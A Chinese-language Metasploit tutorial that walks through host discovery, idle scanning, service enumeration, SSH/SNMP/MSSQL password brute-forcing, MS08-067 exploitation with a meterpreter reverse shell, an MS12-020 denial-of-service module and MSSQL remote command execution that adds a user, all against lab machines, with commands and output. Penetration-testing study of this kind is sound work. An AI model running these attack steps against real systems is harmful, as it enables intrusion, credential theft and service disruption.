Nmap
在msf里的namp 使用方法与单独使用无差别,不再赘述。
msf5 > db_nmap -sV 192.168.172.130
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST
[*] Nmap: Nmap scan report for 192.168.172.130
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:02:A0:43 (VMware)
[*] Nmap: Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds
auxiliary/scanner/
查看所有模块
msf5 > use auxiliary/scanner [按两次table]
主机发现
发现方式
msf5 > use auxiliary/scanner/discovery/ [按两次table]
use auxiliary/scanner/discovery/arp_sweep use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/empty_udp use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/ipv6_multicast_ping use auxiliary/scanner/discovery/udp_sweep
ARP 主机发现:
msf5 > use auxiliary/scanner/discovery/arp_sweep
# 设置目标ip,表示方式可以为192.168.1.1-192.168.1.20 或 192.168.1.1/24 或 192.168.1.1/24,192.168.2.1/24
#
msf5 auxiliary(scanner/discovery/arp_sweep) > options
# 可以伪造源ip(SHOST)与源MAC(SMAC)
# 设置线程数为20
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf5 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.130 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
查找僵尸机(足够空闲,ipid顺序增长)
msf5 > use auxiliary/scanner/ip/ipidseq
msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.172.1/24
msf5 auxiliary(scanner/ip/ipidseq) > set ports 80
msf5 auxiliary(scanner/ip/ipidseq) > set threads 20
msf5 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned 30 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 129 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
发现了192.168.172.2与192.168.172.130的IPID是递增的,如果他足够空闲(没有与其它主机通信),就可以作为僵尸机代替扫描。
使用nmap 利用僵尸机进行僵尸扫描:
msf5 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 15:12 CST
[*] Nmap: Idle scan using zombie 192.168.172.130 (192.168.172.130:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.172.133
[*] Nmap: Host is up (0.051s latency).
[*] Nmap: Not shown: 986 closed|filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 7/tcp open echo
[*] Nmap: 9/tcp open discard?
[*] Nmap: 13/tcp open daytime?
[*] Nmap: 17/tcp open qotd Windows qotd (English)
[*] Nmap: 19/tcp open chargen
[*] Nmap: 53/tcp open domain?
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1028/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1029/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Service
端口扫描(推荐使用nmap,效率更高)
扫描方式
msf5 > use auxiliary/scanner/portscan/ [按两次table]
use auxiliary/scanner/portscan/ack use auxiliary/scanner/portscan/syn use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/ftpbounce use auxiliary/scanner/portscan/tcp
syn扫描
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.172.130
msf5 auxiliary(scanner/portscan/syn) > set ports 80
msf5 auxiliary(scanner/portscan/syn) > set threads 50
msf5 auxiliary(scanner/portscan/syn) > run
SNMP扫描
破解
msf5 > use auxiliary/scanner/snmp/snmp_login
msf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10
msf5 auxiliary(scanner/snmp/snmp_login) > run
破解了一个只读权限的账户
[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
读取信息
msf5 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum
msf5 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_enum) > run
[*] System information:
Host IP : 192.168.172.135
Hostname : bingyi-virtual-machine
Description : Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Contact : Me <me@example.org>
Location : Sitting on the Dock of the Bay
Uptime snmp : 11:18:08.39
Uptime system : 00:06:23.04
System date : 2020-11-9 10:51:42.0
windows:
# 枚举用户信息
use auxiliary/scanner/snmp/snmp_enumusers
# 枚举文件共享信息
use auxiliary/scanner/snmp/snmp_enumshares
SMB扫描
发现
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.172.131:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.172.131:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
扫描命名管道
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/pipe_auditor) > run
枚举共享
msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbuser msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbpass msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > run
SSH 扫描
发现
版本扫描,如果是低版本可利用漏洞。
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.172.135:22 - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.172.135:22 - Scanned 1 of 1 hosts (100% complete)
密码爆破
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login) > set username bingyi
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file ~/Desktop/dic/shhpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set thread 10
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.172.129:35897 -> 192.168.172.135:22) at 2020-11-11 13:00:13 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
密钥爆破
msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > show options
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path key.txt
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run
FTP
版本扫描
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
尝试匿名登录
msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.172.131:21 - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
密码破解
略
Windows利用已获得的shell收集目标缺失补丁
获取shell,将shell注入其它进程
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run -j
# 进入会话
msf5 exploit(windows/smb/ms08_067_netapi) > session 2
# 显示shell当前所在进程
meterpreter > getpid
# 显示目标主机所有进程
meterpreter > ps
# 将shell注入进程其它进程
meterpreter > migrate 880
# 若之后报错[-] Known bug in WMI query, try migrating to another process,需要再注入其它进程
获取未安装补丁
msf5 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches
msf5 post(windows/gather/enum_patches) > set session 2
msf5 post(windows/gather/enum_patches) > run
VNC
密码破解
msf5 > use auxiliary/scanner/vnc/vnc_login
msf5 auxiliary(scanner/vnc/vnc_login) > show options
尝试空密码登录
msf5 > use auxiliary/scanner/vnc/vnc_none_auth
RDP 远程桌面漏洞
检查是否存在某个漏洞
msf5 > use auxiliary/scanner/rdp/ms12_020_check
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...
利用
msf5 auxiliary(scanner/rdp/ms12_020_check) > search ms12-020
msf5 auxiliary(scanner/rdp/ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...
MSSQL
端口查询
默认端口:TCP1433(或动态端口)
动态端口查询方法:
msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/mssql/mssql_ping) > run
密码爆破
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.172.135
# 如果是动态端口需手动配置
msf5 auxiliary(scanner/mssql/mssql_login) > set rport 49165
msf5 auxiliary(scanner/mssql/mssql_login) > set threads 10
msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file pass.txt
msf5 auxiliary(scanner/mssql/mssql_login) > run
远程执行代码
在已知端口,账户,密码后,就可以执行远程命令。
msf5 > use auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > set rhosts 192.168.172.135
msf5 auxiliary(admin/mssql/mssql_exec) > set password 123
# 动态端口使用
msf5 auxiliary(admin/mssql/mssql_exec) > set rport 49165
# 执行命令为添加一个用户
msf5 auxiliary(admin/mssql/mssql_exec) > set CMD net user user pass /ADD
获取应用版本后搜索利用漏洞
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
如知道ftp版本为2.3.4后可根据版本信息搜索:
msf5 auxiliary(scanner/ftp/ftp_login) > search 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
4 exploit/unix/http/zivif_ipcheck_exec 2017-09-01 excellent Yes Zivif Camera iptest.cgi Blind Remote Command Execution
Interact with a module by name or index, for example use 4 or use exploit/unix/http/zivif_ipcheck_exec